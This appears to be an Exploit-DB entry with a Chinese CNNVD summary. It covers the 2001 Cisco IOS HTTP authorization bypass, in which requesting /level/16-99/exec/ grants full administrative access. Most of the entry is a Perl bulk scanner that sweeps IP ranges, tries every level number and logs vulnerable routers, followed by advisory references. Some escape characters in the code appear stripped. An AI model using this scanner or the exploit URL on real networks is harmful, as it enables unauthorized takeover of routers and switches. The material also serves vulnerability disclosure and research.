https://www.exploit-db.com/exploits/20977
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200107-164

IOS是Cisco公司开发的路由器固件。IOS支持很多Cisoco设备(包括路由器和交换机)。在CiscoIOS11.3开始的版本存在一个安全问题，如果它开放了Web管理接口，将允许任意远程攻击者获取该设备的完全的管理权限。攻击者只需要构造一个如下的URL:http:///level/xx/exec/….这里的xx是一个从16-99之间的整数。对于不同的设备，这个数值可能是不同的，但是攻击者仅需要测试84次即可找到正确的数值。这个问题可能导致远程用户获取完全的管理权限，并进一步对网络进行渗透，也可能造成拒绝服务攻击漏洞。

# source: http://www.securityfocus.com/bid/2936/info
#   
# IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches.
#   
# It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access.
#   
# This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service. 
# 

#!/usr/bin/perl
#
# Bulk Scanner for the Cisco IOS HTTP Configuration Arbitrary
# Administrative Access Vulnerability
# Found: 06-27-01 - Bugtraq ID: 2936
# Written by hypoclear on 07-03-01
#
# usage: ./IOScan.pl <start ip> <end ip>
# Note: start and end ip must be a Class B or C network
# example: ./IOScan 192.168.0.0 192.168.255.255
#
# hypoclear - [email protected] - http://hypoclear.cjb.net
# This and all of my programs fall under my disclaimer, which
# can be found at: http://hypoclear.cjb.net/hypodisclaim.txt

use IO::Socket; 

die "nusage: $0 <start ip> <end ip>
Note:  start and end ip must be a Class B or C network
ex:   ./IOScan 192.168.0.0 192.168.255.255nn" unless @ARGV > 0;
$num = 16; $ipcount = 0; $vuln = 0;

if (defined $ARGV[1])
 { $currentIP = $ARGV[0]; $endIP = $ARGV[1];
   while(1)
    { @CURIP = split(/./,$currentIP);
      if (($CURIP[2] > 255) && ($CURIP[3] > 255))
       { scanEnd();
       }
      print "Scanning $currentIPn";
      scan($currentIP);
      if ($currentIP eq $endIP)
       { scanEnd();
       }
      if ($CURIP[3] < 255)
       { $CURIP[3]++;
       }
      else
       { $CURIP[2]++;
         $CURIP[3]=0;
       }
      $currentIP = "";
      foreach $item (@CURIP)
        { $currentIP .= "$item.";
        }
      $currentIP =~ s/.$//;
      $ipcount++;
     }
 }


sub scan
  { while ($num <100)
      { $IP = $_[0];
        sender("GET /level/$num/exec/- HTTP/1.0nn");
        if ($webRecv =~ /200 ok/)
         { $vuln++;
           open(OUT,">>ios.out") || die "Can't write to file";
           print OUT "$IP is Vulnerablen";
           close(OUT);
           $num = 101;
         }
        $num++;
      }
     $num = 16;
  }


sub sender
  { $sendsock = IO::Socket::INET -> new(Proto     => 'tcp',
                                        PeerAddr  => $IP,
                                        PeerPort  => 80,
                                        Type      => SOCK_STREAM,
                                        Timeout   => 1);
        unless($sendsock){die "Can't connect to $ARGV[0]"}
   $sendsock->autoflush(1);

   $sendsock -> send($_[0]);
   $webRecv = ""; while(<$sendsock>){$webRecv .= $_} $webRecv =~ s/n//g;
   close $sendsock;
  }


sub scanEnd
  { print "nScanned $ipcount ip addresses, $vuln addresses found vulnerable.n";
    if ($vuln > 0) {print "Check ios.out for vulnerable addresses.";}
    die "n";
  }

来源:CERT/CCAdvisory:CA-2001-14
名称:CA-2001-14
链接:http://www.cert.org/advisories/CA-2001-14.html
来源:BID
名称:2936
链接:http://www.securityfocus.com/bid/2936
来源:CISCO
名称:20010627IOSHTTPauthorizationvulnerability
链接:http://www.cisco.com/warp/public/707/IOS-httplevel-pub.html
来源:XF
名称:cisco-ios-admin-access(6749)
链接:http://xforce.iss.net/static/6749.php
来源:BUGTRAQ
名称:20010702CiscodeviceHTTPexploit…
链接:http://www.securityfocus.com/archive/1/[email protected]
来源:BUGTRAQ
名称:20010629Re:CiscoSecurityAdvisory:IOSHTTPauthorizationvulnerability
链接:http://www.securityfocus.com/archive/1/[email protected]
来源:BUGTRAQ
名称:20010702ios-http-auth.sh
链接:http://www.securityfocus.com/archive/1/[email protected]
来源:BUGTRAQ
名称:20010702CiscoIOSHTTPConfigurationExploit
链接:http://www.securityfocus.com/archive/1/[email protected]
来源:OSVDB
名称:578
链接:http://www.osvdb.org/578
来源:CIAC
名称:L-1